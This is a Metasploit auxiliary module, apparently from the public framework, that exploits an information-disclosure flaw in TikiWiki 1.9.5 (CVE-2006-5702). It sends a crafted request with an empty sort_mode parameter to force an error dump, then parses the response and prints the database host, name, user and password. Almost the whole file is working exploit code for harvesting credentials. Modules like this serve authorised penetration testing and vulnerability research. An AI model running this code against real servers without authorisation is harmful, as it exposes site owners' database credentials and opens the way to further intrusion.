##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
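class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Keys of the leaked PHP var_dump() output that are reported, paired with
  # the label used when printing them. Each key is matched on one line of the
  # body and its value is read from the line that follows it.
  CONFIG_KEYS = [
    [/\["file"\]=>/, 'Install path'],
    [/\["databaseType"\]=>/, 'DB type'],
    [/\["database"\]=>/, 'DB name'],
    [/\["host"\]=>/, 'DB host'],
    [/\["user"\]=>/, 'DB user'],
    [/\["password"\]=>/, 'DB password']
  ].freeze

  # Matches the var_dump() string line that carries a key's value; capture 1
  # is the value itself.
  VALUE_RE = /string\(\d+\) "(.*)"/m

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TikiWiki Information Disclosure',
        'Description' => %q{
          A vulnerability has been reported in Tikiwiki, which can be exploited by
          an anonymous user to dump the MySQL user & passwd just by creating a mysql
          error with the "sort_mode" var.

          The vulnerability was reported in Tikiwiki version 1.9.5.
        },
        'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '30172'],
          ['BID', '20858'],
          ['CVE', '2006-5702'],
          ['URL', 'https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/'],
        ],
        'DisclosureDate' => '2006-11-01',
        'Actions' => [
          ['Dump', { 'Description' => 'Dump user and password' }]
        ],
        'DefaultAction' => 'Dump',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('URI', [true, 'TikiWiki directory path', '/tikiwiki']),
      ]
    )
  end

  # Requests tiki-lastchanges.php with an empty sort_mode and reports the
  # database settings found in the resulting error dump, if any.
  #
  # @return [void]
  def run
    print_status('Establishing a connection to the target...')

    uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')
    rpath = uri + '?days=1&offset=0&sort_mode='

    res = send_request_raw({
      'uri' => rpath,
      'method' => 'GET',
      'headers' =>
      {
        'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Connection' => 'Close'
      }
    }, 25)

    # Check the status code rather than the reason phrase: the phrase is
    # optional and server-dependent, the code is not.
    unless res && res.code == 200
      print_status('No response from the server.')
      return
    end

    print_status('Get information about database...')

    found = extract_db_settings(res.body.to_s)
    if found.empty?
      print_status('Could not obtain information about database.')
      return
    end

    found.each { |label, value| print_status("#{label} : #{value}") }
  end

  private

  # Scans the response body for the `["key"]=>` lines listed in CONFIG_KEYS
  # and collects the string value printed on the line after each one.
  #
  # Stops once every key has been collected. A key whose following line is
  # missing (key on the last line) or does not carry a string value is
  # skipped instead of raising on a nil match.
  #
  # @param body [String] raw HTTP response body
  # @return [Array<Array(String, String)>] [label, value] pairs in the order
  #   they were found; empty when nothing matched
  def extract_db_settings(body)
    lines = body.split(/\r?\n/)
    found = []

    lines.each_with_index do |row, idx|
      break if found.length >= CONFIG_KEYS.length

      entry = CONFIG_KEYS.find { |key_re, _| row.match?(key_re) }
      next unless entry

      # The value is on the next line; guard both a missing line and a
      # non-matching one.
      value = lines[idx + 1]&.match(VALUE_RE)
      next unless value

      found << [entry[1], value[1]]
    end

    found
  end
end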